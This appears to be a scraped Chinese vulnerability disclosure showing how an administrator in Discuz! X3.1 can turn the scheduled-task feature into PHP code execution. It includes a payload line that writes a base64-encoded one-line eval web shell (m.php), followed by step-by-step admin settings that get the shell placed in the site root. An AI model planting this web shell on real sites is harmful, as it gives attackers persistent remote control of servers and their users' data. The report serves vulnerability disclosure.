VULHUB ™

### 简要描述： 路人甲报过的洞，只是发现了新的利用方法，随手写下 ### 详细说明： 总的来说，就是利用计划任务来执行php代码的。实现过程如下： 测试版本：Discuz! X3.1 Release 20131122 1.全局 » 站点信息：网站第三方统计代码里面插入：<?php fputs(fopen('m.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));?> 插入后，更新下缓存。 [<img src="https://images.seebug.org/upload/201312/112149420c25c6557c3dd6f9a957b2607eb221c4.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/112149420c25c6557c3dd6f9a957b2607eb221c4.jpg) 2. 门户 » HTML管理 » 设置： 设置 专题HTML存放目录:source/include/cron [<img src="https://images.seebug.org/upload/201312/11215305c0beb3625ef86e86ba7f5ce73d879adf.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/11215305c0beb3625ef86e86ba7f5ce73d879adf.jpg) 3.门户 » 专题管理 » 列表 » 创建专题,新建一个专题： 专题标题,随便写，静态化名称：test ，附加内容 选上 站点尾部信息然后提交。 [<img src="https://images.seebug.org/upload/201312/1122045678cadf2309d4c204349a4e6a7faf1fb5.jpg" alt="5.jpg" width="600"...

### 简要描述： 路人甲报过的洞，只是发现了新的利用方法，随手写下 ### 详细说明： 总的来说，就是利用计划任务来执行php代码的。实现过程如下： 测试版本：Discuz! X3.1 Release 20131122 1.全局 » 站点信息：网站第三方统计代码里面插入：<?php fputs(fopen('m.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));?> 插入后，更新下缓存。 [<img src="https://images.seebug.org/upload/201312/112149420c25c6557c3dd6f9a957b2607eb221c4.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/112149420c25c6557c3dd6f9a957b2607eb221c4.jpg) 2. 门户 » HTML管理 » 设置： 设置 专题HTML存放目录:source/include/cron [<img src="https://images.seebug.org/upload/201312/11215305c0beb3625ef86e86ba7f5ce73d879adf.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/11215305c0beb3625ef86e86ba7f5ce73d879adf.jpg) 3.门户 » 专题管理 » 列表 » 创建专题,新建一个专题： 专题标题,随便写，静态化名称：test ，附加内容 选上 站点尾部信息然后提交。 [<img src="https://images.seebug.org/upload/201312/1122045678cadf2309d4c204349a4e6a7faf1fb5.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1122045678cadf2309d4c204349a4e6a7faf1fb5.jpg) 4. 开启刚才创建的专题，然后生成： [<img src="https://images.seebug.org/upload/201312/11215706e06b4a289ed149dcd311d8e582747236.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/11215706e06b4a289ed149dcd311d8e582747236.jpg) 5.工具 » 计划任务 » 新增： test ，然后提交。然后 编辑计划任务 - test，分钟：设置为：1 ，任务脚本:test.html ， 然后 提交。 6.成功在根目录生成一句话 m.php [<img src="https://images.seebug.org/upload/201312/11220703b81003942909195c742d7c777a89bc3a.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/11220703b81003942909195c742d7c777a89bc3a.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201312/11220713fc7a51d9f9b2d1babcfd2aaa728ce77f.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/11220713fc7a51d9f9b2d1babcfd2aaa728ce77f.jpg)